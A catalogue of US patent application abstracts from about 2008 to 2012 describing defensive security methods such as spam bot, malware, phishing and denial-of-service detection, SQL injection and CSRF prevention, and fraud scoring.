20120210420Systems and Methods of Probing Data Transmissions for Detecting Spam Bots - A computer-implemented system and method for detecting, by a mail server module, spam bot activity by a client device. An email session is conducted between the mail server module and the client device according to a predetermined protocol that includes exchange of messages between the mail server module and the client device. The mail server module probes compliance with the predetermined protocol including: purposefully introducing at least one irregularity into a first message from the mail server module; monitoring a subsequent message transmission from the client device; comparing the subsequent message against reference criteria; and producing a reputability determination for the client device based on an extent to which the subsequent message was a proper response to the at least one irregularity according to the predetermined protocol, the reputability determination being indicative of a likelihood that the client device conducts spam bot activity.08-16-2012
20120210421MALICIOUS USER AGENT DETECTION AND DENIAL OF SERVICE (DOS) DETECTION AND PREVENTION USING FINGERPRINTING - A method may include receiving a session control protocol request message and fingerprinting the received session control protocol message. The method may further include comparing the fingerprint of the received request message to a list of fingerprints associated with known malicious user agents and rejecting the request message when the fingerprint of the received message matches any fingerprint in the list of fingerprints associated with known malicious user agents. The method may include comparing the fingerprint of the received request message to the list of fingerprints associated with known non-malicious user agents and accepting the request message when the fingerprint of the received message matches any fingerprint in the list of fingerprints associated with known non-malicious user agents.08-16-2012
20120210425Network Surveillance - A method of network surveillance includes receiving network packets handled by a network entity and building at least one long-term and at least one short-term statistical profile from a measure of the network packets that monitors data transfers, errors, or network connections. A comparison of the statistical profiles is used to determine whether the difference between the statistical profiles indicates suspicious network activity.08-16-2012
20120005749Generic Fraud Detection Model - A method for dynamically updating a model is described. The method includes accessing a model that specifies expected characteristics for a transaction. The model includes variables associated with fraud. The method also includes receiving at least one value for each of the variables while monitoring transactions, and updating a distribution of values for each variable based on the received value. The received value is compared with the updated distribution to determine a deviation from a threshold value associated with a percentile of the updated distribution that is indicative of fraud.01-05-2012
20080289037SYSTEMS AND METHODS TO SECURE RESTRICTED INFORMATION IN ELECTRONIC MAIL MESSAGES - Systems and methods are provided to secure restricted information in electronic mail messages. According to some embodiments, it is determined at a client device that an email message is being generated by a user. A security classification may be associated with the email message, and the email message may be sent toward a destination along with an indication of the security classification, wherein the email message is routed based, at least in part, on the security classification.11-20-2008
20120117644System and Method for Internet Security - A computer implemented method for preventing SQL injection attacks comprises intercepting a web request associated with a web service at a first software hook in a first web service execution context, persisting at least a portion of the intercepted web request in a storage location associated with the first software hook and accessible to at least one additional execution context, intercepting a database query generated by at least one web service processing operation at a second software hook associated with the execution of the query, wherein the query is generated in response to the intercepted web request and the second hook retrieves the persisted portion of the intercepted web request, comparing a portion of the persisted portion of the intercepted web request with at least a portion of the intercepted database query, and determining, prior to the query being executed, whether the query corresponds to a potential SQL injection attack.05-10-2012
20120180127SYSTEM AND METHOD FOR IMPLEMENTING A HIDDEN SERVER - A technology for preventing network attacks. A service request is intercepted at an unaddressed port of a hidden device from a second device. The service request intended for a visible device is processed by the hidden device. A response may be provided based on the processing and sent to the second device.07-12-2012
20120180126Probable Computing Attack Detector - A probable computing attack detector monitors electrical power consumption of a computing device. Task data may be acquired for at least one task operating on the computing device. A predicted electrical power consumption may be calculated for the computing device employing a user-centric power model and the task data. A probable attack may be detected when the electrical power consumption disagrees with the predicted electrical power consumption by a determined margin.07-12-2012
20120023578MALICIOUS CODE DETECTION - A device includes a pipeline and a detector that are both implemented at least in hardware. Data is moved through the pipeline to perform processing of the data unrelated to detection of malicious code. The detector detects the malicious code within the data as the data is moved through the pipeline, in parallel with the processing of the data as the data is moved through the pipeline. The detector detects the malicious code within the data as the data is moved through the pipeline without delaying movement of the data into, through, and out of the pipeline.01-26-2012
20120023577VERIFYING WORK PERFORMED BY UNTRUSTED COMPUTING NODES - Techniques for verifying work performed by untrusted computing nodes are provided. A central computing system determines a first computation that is to be performed, at least in part, by a first untrusted computing node. The central computing system also determines a transformation function that is applied to the first computation to produce an equivalent second computation that is to be performed, at least in part, by a second untrusted computing node. The central computing system assigns the first computation to the first untrusted computing node and the second computation to the second untrusted computing node while keeping the transformation function secret. The central computing system receives a first result for the first computation and a second result for the second computation. The central computing system analyzes the first and second results to verify the work performed by the first and second untrusted computing nodes.01-26-2012
20080289039METHOD AND SYSTEM FOR PROTECTING A MESSAGE FROM AN XML ATTACK WHEN BEING EXCHANGED IN A DISTRIBUTED AND DECENTRALIZED NETWORK SYSTEM - A system may include an attack preventing creator module that is configured to create at least one attack preventing header block for a message having message elements in a tree structure with one or more of the message elements being signed, wherein the attack preventing header block includes structure specific information that comprises at least a digest value of a pre-order traversal list of the tree structure and, for each signed message element, a unique ID attribute, a depth, a parent's name and a parent's ID attribute. The system may include an attack preventing verifier module that is configured to verify the at least one attack preventing header block by comparing the structure specific information which can be derived from the message with the structure specific information carried by the first attack preventing header block.11-20-2008
20120159619Formal Analysis of the Quality and Conformance of Information Flow Downgraders - Mechanisms for evaluating downgrader code in application code with regard to one or more security guidelines are provided. Downgrader code in application code is identified, where the downgrader code is a portion of code in the application code that operates on an information flow of the application code to ensure that the confidentiality of information input to the downgrader code is preserved in the output of the downgrader code. Processes of the downgrader code are evaluated against security guidelines to determine if the processes violate the security guidelines. A notification is generated in response to the evaluation indicating that the processes of the downgrader code violate the security guidelines. The notification is output to a computing device for consideration.06-21-2012
20120210424System for Efficiently Handling Cryptographic Messages Containing Nonce Values in a Wireless Connectionless Environment Without Compromising Security - A secure communication module that accepts a cryptographic message if a nonce value for the received message is greater than the largest nonce value yet seen. If the received nonce value is not the largest nonce value yet seen, the secure communication module compares the received nonce value with a nonce acceptance window. If the nonce value falls outside the nonce acceptance window, the secure communication module rejects the received message and assumes a replay attack. Alternatively, if the nonce value falls within the nonce acceptance window, the secure communication module compares the received nonce value with a replay window mask. If comparison with the replay window mask indicates that the received nonce value has been seen before, the secure communication module rejects the received message and assumes a replay attack. Otherwise, the secure communication module accepts the message and adds the received nonce value to the replay window mask.08-16-2012
20120210423METHOD AND APPARATUS FOR DETECTING MALICIOUS SOFTWARE THROUGH CONTEXTUAL CONVICTIONS, GENERIC SIGNATURES AND MACHINE LEARNING TECHNIQUES - Novel methods, components, and systems that enhance traditional techniques for detecting malicious software are presented. More specifically, methods, components, and systems are presented that use important contextual information from a client system (such as the recent history of events on that system), machine learning techniques, the automated deployment of generic signatures, and combinations thereof, to detect malicious software. The disclosed invention provides a significant improvement with regard to automation compared to previous approaches.08-16-2012
20120159620Scareware Detection - A machine-implemented method for detecting scareware includes the steps of accessing one or more landing pages to be evaluated, extracting one or more features from the landing pages, and providing a classifier to compare the features extracted from the landing pages with features of known scareware and non-scareware pages. The classifier determines a likelihood that the landing page is scareware. If determined to be scareware, the landing page is removed from search results generated by a search engine. The features can be URLs, text, image interest points, image descriptors, a number of pop-ups generated, IP addresses, hostnames, domain names, text derived from images, images, metadata, identifiers of executables, and combinations thereof.06-21-2012
20120159623METHOD AND APPARATUS FOR MONITORING AND PROCESSING DNS QUERY TRAFFIC - A method for monitoring and processing domain name system (DNS) query traffic includes: monitoring DNS query traffic in each time slot during a monitoring period consisting of n time slots; extracting traffic information for the monitoring period by using the DNS query traffic monitored in each time slot; and analyzing the extracted traffic information to detect a DNS traffic flooding attack.06-21-2012
20120159622METHOD AND APPARATUS FOR GENERATING ADAPTIVE SECURITY MODEL - A method for generating an adaptive security model includes: generating an initial security model with respect to data input via the Internet during a learning process; and continuously updating the initial security model by applying characteristics of the input data during an online process. Generating the initial security model includes: matching the input data with a unit having a weight vector whose distance to the input data is the closest, using a first unsupervised algorithm; generating a map composed of the weight vectors of the units; and performing a second unsupervised algorithm using the weight vectors forming the map as input values to partition an attack cluster.06-21-2012
20120159621DETECTION SYSTEM AND METHOD OF SUSPICIOUS MALICIOUS WEBSITE USING ANALYSIS OF JAVASCRIPT OBFUSCATION STRENGTH - The present invention provides a detection system of a suspicious malicious website using the analysis of a JavaScript obfuscation strength, which includes: an entropy measuring block of measuring an entropy of an obfuscated JavaScript present in the website, a special character entropy, and a variable/function name entropy; a frequency measuring block of measuring a specific function frequency, an encoding mark frequency and a % symbol frequency of the JavaScript; a density measuring block of measuring the maximum length of a single character string of the JavaScript; and a malicious website confirming block of determining whether the relevant website is malicious by comparing an obfuscation strength value, measured by the entropy measuring block, the frequency measuring block and the density measuring block, with a threshold value.06-21-2012
20120072986METHODS FOR DETECTING AND CLASSIFYING SIGNALS TRANSMITTED OVER A RADIO FREQUENCY SPECTRUM - A method for classifying a signal is disclosed. The method can be used by a station or stations within a network to classify the signal as non-cooperative (NC) or a target signal. The method performs classification over channels within a frequency spectrum. The percentage of power above a first threshold is computed for a channel. Based on the percentage, a signal is classified as a narrowband signal. If the percentage indicates the absence of a narrowband signal, then a lower second threshold is applied to confirm the absence according to the percentage of power above the second threshold. The signal is classified as a narrowband signal or pre-classified as a wideband signal based on the percentage. Pre-classified wideband signals are classified as a wideband NC signal or target signal using spectrum masks.03-22-2012
20120072985MANAGING SERVICES IN A CLOUD COMPUTING ENVIRONMENT - Provided are a system and method which enable an organization or user to manage computational services in a cloud computing network for security, compliance and governance. The management includes creating a trusted virtual network including encrypted data storage, encrypted data transport, and trusted instances of servers, all communicatively coupled together to form a trusted cloud computing environment that is associated with the organization. A web portal running on a web server provides a point of access to the cloud computing environment. A workflow, customized to the organization, is accessed to implement one or more policies in the trusted computing environment in order to manage the trusted cloud computing environment. Access control to the trusted cloud computing environment is used to ensure that access is limited to users authorized by the organization and to ensure compliance with adopted standards.03-22-2012
20090300759ATTACK PREVENTION TECHNIQUES - Techniques for detecting and responding to attacks on computer and network systems including denial-of-service (DoS) attacks. A packet is classified as potentially being an attack packet if it matches an access control list (ACL) specifying one or more conditions. One or more actions may be performed responsive to packets identified as potential attack packets. These actions may include dropping packets identified as potential attack packets for a period of time, rate limiting a port over which the potential attack packets are received for a period of time, and other actions.12-03-2009
20120124665METHOD AND APPARATUS FOR DETECTING A ROGUE ACCESS POINT IN A COMMUNICATION NETWORK - A method and apparatus for detecting a rogue access point in a communication network is described herein. The method includes a probing unit sending a pre-detection message to an associated access point in the communication network. The pre-detection message indicates the start of a rogue access point detection mode and informs the associated access point not to respond to probe requests following the pre-detection message. The method further includes the probing unit broadcasting probe requests in the communication network. The probing unit detects that one or more of the plurality of access points is the rogue access point based on receiving a probe response in reply to the broadcast probe request from the rogue access point. A method for detecting a rogue access point includes broadcasting a probe request with a proprietary information bit and detecting the rogue access point based on receiving a probe response for the broadcast probe request.05-17-2012
20120124664DIFFERENTIATING BETWEEN GOOD AND BAD CONTENT IN A USER-PROVIDED CONTENT SYSTEM - A system differentiates good content from bad content in a user-provided content system. Messages are analyzed for features that characterize messages. A feature may occur in one or more messages. A feature that has more than a threshold number of occurrences in messages in a time interval is identified for further analysis. Enhanced authentication is requested from senders of the messages with occurrences of the identified feature. Based on the rate at which senders of the messages pass authentication, the content associated with the message is determined to be good content or bad content. Subsequent messages are blocked or successfully delivered based on whether features occurring in the messages are indicative of good content or bad content.05-17-2012
20110107420LOCATOR CODING IN A COMMUNICATIONS NETWORK - A method for use in interconnected communications networks, comprising negotiating a locally unique interface identifier between a network entity and a network such that the locally unique interface identifier differs from any interface identifier used by either the network entity or the network; using the locally unique interface identifier to identify an egress interface from the network entity to the network; and using the locally unique interface identifier to identify an egress interface from the network to the network entity. By using a common locally unique interface identifier between networks and network entities on a path between a source or destination network entity and a core network, a globally unique locator for the source or destination network entity can be constructed by concatenating elements derived from a plurality of negotiated common local interface identifiers between networks and network entities on the path.05-05-2011
20110107418DETECTING ANOMALIES IN ACCESS CONTROL LISTS - An access control anomaly detection system and method to detect potential anomalies in access control permissions and report those potential anomalies in real time to an administrator for possible action. Embodiments of the system and method take as input access control lists and semantic groups (or any dataset having binary matrices) to perform automated anomaly detection. This input is processed in three broad phases. First, policy statements are extracted from the access control lists. Next, object-level anomaly detection is performed using thresholds by categorizing outliers in the policies discovered in the first phase as potential anomalies. This object-level anomaly detection can yield object-level security anomalies and object-level accessibility anomalies. Group-level anomaly detection is performed in the third phase by using the semantic groups and user sets extracted in the first phase to find maximal overlaps using group mapping. This group-level anomaly detection can yield group-level security anomalies and group-level accessibility anomalies.05-05-2011
20110107417Detecting AP MAC Spoofing - Detecting access point MAC spoofing in a wireless digital network. A sensor in a wireless digital network learns the MAC address and operating channel for at least one access point. If the sensor detects frames being sent to a MAC address on a channel other than the channel associated with that MAC address, then the access point associated with the MAC address is being spoofed. These frames may be association frames, or data frames. If the sensor is running as part of an access point the sensor also knows what clients are associated with the access point. If the sensor detects frames indicating association, such as data frames, sent to its MAC address, but the client is not associated with the access point, then the access point is being spoofed. Similarly, if the sensor receives frames on a channel other than that associated with the access point and receives traffic for the access point's MAC address, the access point is being spoofed. The sensor may be a separate device on the wireless network, or may be functionality included in one or more access points on the network.05-05-2011
20110107419SYSTEMS AND METHODS FOR IMPROVED IDENTIFICATION AND ANALYSIS OF THREATS TO A COMPUTING SYSTEM - A security tool can access a tagging tool and the history generated by the tagging tool in order to identify potential threats and analyze the identified threats. When a potential threat is detected or an actual threat is identified, the security tool can request the history of actions from the tagging tool corresponding to the threat. The security tool can compare the potential or actual threat with the history of any action recorded by the tagging tool in order to classify a potential threat as an actual threat or determine the source or cause of an actual threat.05-05-2011
20100095376SOFTWARE WATERMARKING - Various techniques for uniquely marking software, such as by reference to hidden information or other telltale features, are detailed. Some marks are evident in static code. Others are observable when the code is executed. Some do not manifest themselves until the code is exercised with a specific stimulus. Different ones of the techniques are applicable to source code, object code, and firmware. A great number of other features and arrangements are also disclosed.04-15-2010
20100095378Classifying a Message Based on Fraud Indicators - Systems, methods, and media for classifying messages are disclosed. A plurality of fraud indicators are identified in the message. A signature of the message is generated. The generated signature of the message is compared to a stored signature. The stored signature is based on a statistical analysis of fraud indicators in a second message associated with the stored signature. A determination as to whether the message is fraudulent is made based on the comparison. The message is processed based on the determination that the message is a fraudulent message.04-15-2010
20100095377DETECTION OF SUSPICIOUS TRAFFIC PATTERNS IN ELECTRONIC COMMUNICATIONS - Methods and systems for detecting suspicious traffic patterns in electronic communications are provided. According to one embodiment, an electronic mail (email) message is received by a mail filter (milter), which evaluates a traffic pattern represented by the email message by scanning information associated with the email message and comparing it to information associated with one or more traffic analysis profiles. If the email message is identified by the milter as being inconsistent with normal email traffic patterns as represented by the one or more traffic analysis profiles, then the milter causes the email message to be handled in accordance with an email security policy associated with suspicious traffic patterns. For example, in the context of an outbound message, the originator may be alerted to a factor contributing to the identification and the originator may be provided with an opportunity to address the factor.04-15-2010
20100095375Method for locating fraudulent replicas of web sites - A method for detecting Web sites used for phishing, including preselecting one or more Web sites to be examined for duplication, selecting at least one or more elements that are present in the preselected Web site and that relate to characteristic identifying features of the preselected Web site, forming at least one search query using the one or more elements, and submitting the at least one search query to an indexed public search engine. The elements illustratively may be URL substrings, content identification substrings, or tree structure-related substrings. A report of Web sites using the selected one or more search terms is received from the public search engine in response to the query, and the preselected Web site is eliminated from the Web sites found in the search. The remaining Web sites retrieved in the search are further analyzed, by additional focused searching of the retrieved pages, by comparing header or tree structure information, or other techniques to compare them with the preselected Web site to identify unauthorized near-replicas of the known legitimate Web site for responsive action.04-15-2010
20100095374 GRAPH BASED BOT-USER DETECTION - Computer implemented methods are disclosed for detecting bot-user groups that send spam email over a web-based email service. Embodiments of the present system employ a two-prong approach to detecting bot-user groups. The first prong employs a historical-based approach for detecting anomalous changes in user account information, such as aggressive bot-user signups. The second prong of the present system entails constructing a large user-user relationship graph, which identifies bot-user sub-graphs through finding tightly connected subgraph components. 04-15-2010
20110099630 SYSTEM AND METHOD FOR PROTECTING COMMUNICATION DEVICES FROM DENIAL OF SERVICE ATTACKS - A system for preventing successful denial of service attacks comprises a first communication device, a second communication device, and a network. The first and second communication devices establish a communication session via the network. Based on various information, such as a pre-shared secret, one of the communication devices determines a network access filter value and compares this value to at least one data frame in order to authenticate such data frame without committing significant computing resources or any memory space. By updating the network access filter over time, an unauthorized user who discovers the outdated network access filter values is prevented from successfully launching a denial of service attack. 04-28-2011
20110099629 AUTHENTICATING A WEB PAGE WITH EMBEDDED JAVASCRIPT - A method for detecting if a digital document (e.g. an HTML document) is changed by others than authenticated script code (e.g. JavaScript code) is presented. The method comprises loading the authenticated script code into a trusted computer application and storing a snapshot of the digital document in the trusted computer application. Before the authenticated script code is executed, the snapshot of the digital document is compared with the document to verify if the digital document is still authentic. After executing the authenticated script code, the snapshot of the digital document is replaced with an up-to-date copy reflecting eventual changes made to the digital document by the executed script code. The digital document can then at any time be compared with the most recent snapshot to verify if it is authentic. 04-28-2011
20110099628 METHOD AND SYSTEM FOR WEIGHTING TRANSACTIONS IN A FRAUD DETECTION SYSTEM - A method of computing a similarity between a first transaction having a set of properties and a second transaction having the set of properties includes computing an initial weight for each of the properties of the set of properties and computing a similarity between each of the properties of the first transaction and the properties of the second transaction. The method also includes adjusting the initial weight for each of the properties based on a measure of the commonness of each of the properties of the set of properties, normalizing the adjusted weights, and computing the similarity by summing the products of the normalized adjusted weights and the computed similarities. 04-28-2011
20090133121 Method for processing messages and message processing device - A message processing device for processing messages has at least one reception buffer, and a message includes at least one authentication element and one message content. The message is received and stored in the reception buffer. A characteristic variable of a priority for security checking of the message is determined as a function of the message content. A processing sequence for further message processing for the security checking, taking into account the at least one authentication element of the messages in the reception buffer, is defined and carried out as a function of the characteristic variable. 05-21-2009
20120222110 DATA LEAKAGE PROTECTION IN CLOUD APPLICATIONS - A computer-implemented method for data leakage protection is disclosed. A monitoring template corresponding to the cloud application is selected based upon communication between a user and a cloud application and from a plurality of monitoring templates. A monitor is generated using the selected monitoring template. Identifying information of content shared between the user and the cloud application is obtained using the generated monitor. Data about the shared content for security analysis is obtained according to the identifying information of the shared content. 08-30-2012
20120222114 METHOD AND APPARATUS FOR NETWORK FILTERING AND FIREWALL PROTECTION ON A SECURE PARTITION - A management virtual machine on a virtualization technology enabled platform includes a means for providing a firewall and deep packet inspection. An isolated secure partition is provided to host the management application and network packet filtering and firewall functions to provide a secure and trusted platform for manageability applications. A protected component in the operating system in a user partition moves network traffic to the secure partition for inspection and filtering. 08-30-2012
20120272316 METHOD FOR DETECTING THE HIJACKING OF COMPUTER RESOURCES - The present invention provides a method for detecting the hijacking of computer resources, located on an internal network implementing security and confidentiality criteria specific to this internal network, connected to an external network with no such security and confidentiality criteria, through a connection managed by a service provider, comprising: 10-25-2012
20120317641 PEER-TO-PEER (P2P) BOTNET TRACKING AT BACKBONE LEVEL - A method, computer-readable medium, and system for analyzing backbone traffic to determine compromised hosts from among hosts on a network are provided. The backbone traffic includes data flows. Each of the data flows is analyzed to determine peer-to-peer data flows from among the data flows. Each of the peer-to-peer data flows is one of the data flows having a source address and a destination address that are each unassociated with a domain name. The peer-to-peer data flows are analyzed to determine the compromised hosts from among the hosts. Each of the compromised hosts is interconnected with another of the compromised hosts via at least one of the peer-to-peer data flows. 12-13-2012
20120317643 APPARATUS AND METHOD PREVENTING OVERFLOW OF PENDING INTEREST TABLE IN NAME BASED NETWORK SYSTEM - A node apparatus and method are described to prevent overflow of a pending interest table (PIT) in a name based network system. The node apparatus and method increase a number of PITs to correspond to a number of interface units so that the PITs match the interface units, respectively, and store a request message flowing in per interface unit in the matching PITs. In addition, when a capacity used at each of the PITs exceeds a threshold, the node apparatus and method transmit a traffic control message for traffic control through respectively matching interface units to prevent overflow of the PITs. 12-13-2012
20120131669 Determining whether method of computer program is a validator - An illegal pattern and a computer program having a method are received. The method has one or more return statements, and a number of basic blocks. The method is normalized so that each return statement of the target method relating to the illegal pattern returns a constant Boolean value. A first path condition and a second path condition for one or more corresponding paths is determined such that one or more corresponding basic blocks return a constant Boolean value of true for the first path condition and a constant Boolean value of false for the second path condition. An unsatisfiability of each path condition is determined using a monadic second-order logic (M2L) technique. Where the unsatisfiability of either path condition is false, the method is reported as not being a validator. Where the unsatisfiability of either path condition is true, the method is reported as being a validator. 05-24-2012
20120131668 Policy-Driven Detection And Verification Of Methods Such As Sanitizers And Validators - A method includes performing a static analysis on a program having sources and sinks to track string flow from the sources to the sinks. The static analysis includes, for string variables in the program that begin at sources, computing grammar of all possible string values for each of the string variables and, for methods in the program operating on any of the string variables, computing grammar of string variables returned by the methods. The static analysis also includes, in response to one of the string variables reaching a sink that performs a security-sensitive operation, comparing current grammar of the one string variable with a policy corresponding to the security-sensitive operation, and performing a reporting operation based on the comparing. Apparatus and computer program products are also disclosed. 05-24-2012
20120131671 Securing An Access Provider - To secure an access provider, communications to/from the access provider are monitored for a partially-completed connection transaction. Detected partially-completed connection transactions are terminated when they remain in existence for a period of time that exceeds a threshold period of time. The monitoring may include detecting partially-completed connection transactions initiated by an access requestor, measuring the period of time that a partially-completed connection transaction remains in existence, comparing the period of time with the threshold period of time, and resetting a communication port located on the access provider. 05-24-2012
20120131670 Global Variable Security Analysis - A method includes determining selected global variables in a program for which flow of the selected global variables through the program is to be tracked. The selected global variables are less than all the global variables in the program. The method includes using a static analysis performed on the program, tracking flow through the program for the selected global variables. In response to one or more of the selected global variables being used in security-sensitive operations in the flow, use is analyzed of each one of the selected global variables in a corresponding security-sensitive operation. In response to a determination the use may be a potential security violation, the potential security violation is reported. Apparatus and computer program products are also disclosed. 05-24-2012
20120167213 SAFE FILE TRANSMISSION AND REPUTATION LOOKUP - A method of safe file transmission and reputation lookup is provided. As a part of the safe file transmission and reputation lookup methodology, a data file that is to be made available to a data file receiver is accessed and it is determined whether the data file needs to be provided a protective file. The data file is wrapped in a protective file to create a non-executing package file. Access is provided to the non-executing package file where the associated data file is prevented from being executed until data file reputation information is received. 06-28-2012
20120167210 METHOD AND SYSTEM FOR ESTIMATING THE RELIABILITY OF BLACKLISTS OF BOTNET-INFECTED COMPUTERS - A system and a method for determining the reliability of blacklists is disclosed. Each blacklist comprises IP addresses of supposedly infected computers. The reliability is computed by analyzing whether or not the blacklist reports controlled infections from sandboxed environments and by measuring the elapsed time between reported infections and disinfections. The obtained information is then used in combination with several metrics for determining the trustworthiness of the IP address of a given Internet host that requests an online transaction with the purpose of granting or denying access to a service. 06-28-2012
20120167209 AUTOMATIC CONTEXT-SENSITIVE SANITIZATION - An automatic context-sensitive sanitization technique detects errors due to the mismatch of a sanitizer sequence with a browser parsing context. A pre-deployment analyzer automatically detects violating paths that contain a sanitizer sequence that is inconsistent with a browsing context associated with outputting an untrusted input. The pre-deployment analyzer determines a correct sanitizer sequence which is stored in a sanitization cache. During the runtime execution of the web application, a path detector tracks execution of the web application in relation to the violating paths. The correct sanitizer sequence can be applied when the runtime execution follows a violating path. 06-28-2012
20120167208 SYSTEM AND METHOD FOR VOIP HONEYPOT FOR CONVERGED VOIP SERVICES - Disclosed herein are systems, methods, and computer-readable storage media for a honeypot addressing cyber threats enabled by convergence of data and communication services in an enterprise network. Suspicious incoming VoIP calls from the Internet to the enterprise network are intercepted and directed to a VoIP honeypot that acts as a network decoy and responds automatically during call sessions for the suspicious incoming VoIP calls while tracing the suspicious incoming VoIP calls. Suspicious outgoing VoIP calls from the enterprise network to the Internet are also intercepted and directed to the VoIP honeypot. Moreover, an unsolicited VoIP call is redirected to the VoIP honeypot when the unsolicited VoIP call has been received by a user agent in the enterprise network and a human user of the user agent confirms that the unsolicited VoIP call was unsolicited. 06-28-2012
20120167207 Unauthorized Location Detection and Countermeasures - A location sentry system is provided for use within a mobile device. The sentry system can be configured to detect unauthorized attempts to locate mobile devices by monitoring messages passed between the mobile device and the wireless network and/or messages passed between components of the mobile device, and determining that one or more of the messages is/are indicative of an attempt to locate the mobile device. In response to a determination that an unauthorized attempt has been detected, the location sentry can be configured to take one or more actions. For example, the location sentry system could prevent location information from being sent back to the wireless network and/or the location sentry system could cause incorrect information to be sent to the wireless network. 06-28-2012
20120167206 SYSTEM AND METHOD FOR ENABLING SECURE DISPLAY OF EXTERNAL IMAGES - A system and method for securely displaying to a user images retrieved from an external image source. Upon the request for a product catalog by the user via a user interface, a backend retrieves images for the product catalog from external image sources and converts the retrieved images to render inoperable potentially malicious code embedded in the images. The converted images may then be used in the product catalog displayed to the user via the user interface. In an embodiment, the frontend compiles the product catalog and requests images from the backend. Product catalog information may be stored in a database implemented at the backend. 06-28-2012
20120216279 Backward researching time stamped events to find an origin of pestware - A system and method for identifying an origin of suspected pestware activity on a computer is described. One embodiment includes establishing a time of interest relating to a suspicion of pestware on the computer; issuing a timestamp in response to the establishing the time of interest; identifying, in response to the issuing the timestamp, indicia of pestware; and accessing at least a portion of a recorded history of sources that the computer received files from so as to identify, based at least in part upon the identified indicia of pestware, a reference to an identity of a source that is suspected of originating pestware. 08-23-2012
20120254998 METHOD FOR BLOCKING THE EXECUTION OF A HACKING PROCESS - The present invention discloses a method of blocking the execution of a hacking process. In the method, a security process selects a process to be tested. The security process extracts the pattern of the process to be tested and compares it with hack diagnosis references. If the pattern of the process to be tested is included in the hack diagnosis references, the security process determines that the process to be tested is a hacking process. The security process calculates the unique hash value of the hacking process and compares it with hack blocking references. If the unique hash value of the hacking process is included in the hack blocking references, the security process blocks the execution of the hacking process, and, if the unique hash value of the hacking process is not included in the hack blocking references, the security process does not block the execution of the hacking process. 10-04-2012
20120254996 DNS RESOLUTION, POLICIES, AND VIEWS FOR LARGE VOLUME SYSTEMS - Systems and methods for resolving domain name system (DNS) queries are provided herein. Methods may include receiving a DNS query from a DNS client via a DNS server, responsive to the DNS query, generating the DNS response utilizing the at least one policy associated with the view, providing the DNS response to the DNS client from which the DNS query was received, and storing the DNS response in a shared cache, the shared cache including previously generated DNS responses that are available to the DNS server, wherein previously generated DNS responses may be provided to DNS clients upon receiving a DNS query corresponding to at least one of the previously generated DNS responses. 10-04-2012
20120254994 SYSTEM AND METHOD FOR MICROCODE BASED ANTI-MALWARE SECURITY - A system for securing an electronic device includes a processor comprising microcode, a resource coupled to the processor, and a microcode security agent embodied in the microcode. The microcode security agent is configured to intercept a communication and determine whether the communication is indicative of malware. The communication includes a request made of the resource or information generated from the resource. 10-04-2012
20120137364 REMOTE ATTESTATION OF A MOBILE DEVICE - Secure services and hardware on a mobile device are disabled if it is detected that software in the untrusted domain, such as the operating system, has been hacked or tampered with. Mobile devices often have rich, unprotected operating systems which are vulnerable to hacking, especially from execution of one or more apps. These apps are separated from secure services on the device, such as e-wallet services, NFC functionality, camera, enterprise access, and the like, and the present invention ensures that tampering with code in the untrusted domain or operating system does not affect these and other secure services. If tampering in the untrusted space is detected, the secure services and possibly hardware on the device are shut down or disabled. The extent of this disablement may depend on various factors, such as use of the device, type of device, context in which device is used (e.g., military, enterprise). 05-31-2012
20120137363 Method and Device for Preventing CSRF Attack - The disclosure provides a device and method for preventing CSRF attacks, in which the method comprises: intercepting a request sent from a client browser to a server; generating a token; generating a response to the request; inserting the token into the response to the request; and sending the response to the request to the client browser with the token inserted into the response. With the method and device of the disclosure, it is assured that a token is inserted into all the requests made by a user through a client browser for accessing a resource. And it can be assured that the request is issued by the user himself by verifying whether the token in the request is valid, thereby preventing a CSRF attack. 05-31-2012
20120137362 COLLABORATIVE SECURITY SYSTEM FOR RESIDENTIAL USERS - The invention relates to a collaborative system for security information exchange between users, based on the fact that a determined function (whether storing or processing) is spread out at different points of a network to achieve more scalable processing and storing factors than if they were all done at one and the same point. 05-31-2012
20110185421 SYSTEM AND METHOD FOR NETWORK SECURITY INCLUDING DETECTION OF MAN-IN-THE-BROWSER ATTACKS - A method is performed in a network security system implemented in a computer or electronic device that is coupled to secured online resources for detecting unauthorized accesses of those secured online resources. The method includes monitoring a user activity session. It is determined whether the user activity session is indicative of a hidden session by an attacker, where the determination includes comparing the user activity session to an average user activity session. 07-28-2011
20110185420 DETECTION METHODS AND DEVICES OF WEB MIMICRY ATTACKS - A web mimicry attack detection device is provided, including: a first token sequence collector receiving a hypertext transfer protocol request and extracting string content of the hypertext transfer protocol request according to a token collection method to generate a token sequence corresponding to the hypertext transfer protocol request, wherein the token sequence comprises a plurality of the tokens; and a mimicry attack detector generating a label and a confidence score corresponding individually to the tokens according to the tokens and a conditional random field probability model, summing the confidence score individually corresponding to the tokens in the token sequence by a summary rule to generate a summary confidence score, and determining whether the hypertext transfer protocol request is an attack according to the summary confidence score and the label individually corresponding to the tokens. 07-28-2011
20110185419 METHOD AND APPARATUS FOR DETECTING SSH LOGIN ATTACKS - A digital filter correlation engine, wherein the correlation engine combines N arbitrary digital filter states based on the weights and, along with a threshold, generates a network incident. This network incident in turn can be fed back to another digital filter. This multi-layering capability allows the creation of higher level event detections that are time-based for a cyber security analyst to analyze, thereby reducing the amount of manual work the analyst has to do in inspecting behaviors within the network. 07-28-2011
20110185418 DIGITAL FILTER CORRELATION ENGINE - A digital filter correlation engine, wherein the correlation engine combines N arbitrary digital filter states based on the weights and, along with a threshold, generates a network incident. This network incident in turn can be fed back to another digital filter. This multi-layering capability allows the creation of higher level event detections that are time-based for a cyber security analyst to analyze, thereby reducing the amount of manual work the analyst has to do in inspecting behaviors within the network. 07-28-2011
20110185417 Memory Whitelisting - An enhanced whitelisting module associated within a system whitelists unknown files for execution on the system. The whitelisting module may oversee the computation of a hash of a file loaded into the memory and comparison of the hash to hashes within a hash table generated from clean files located on a clean system. The whitelisting module may communicate to a device internal and/or external to the system to retrieve the hash table of clean files. In certain embodiments, a rolling hash (or other piecewise hash) may be used to determine the location and/or extent of the differences between a modified file and a clean file. 07-28-2011
